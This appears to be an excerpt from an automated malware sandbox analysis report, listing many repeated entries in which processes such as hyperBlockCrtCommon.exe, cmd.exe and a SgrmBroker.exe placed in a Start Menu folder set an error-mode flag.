                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
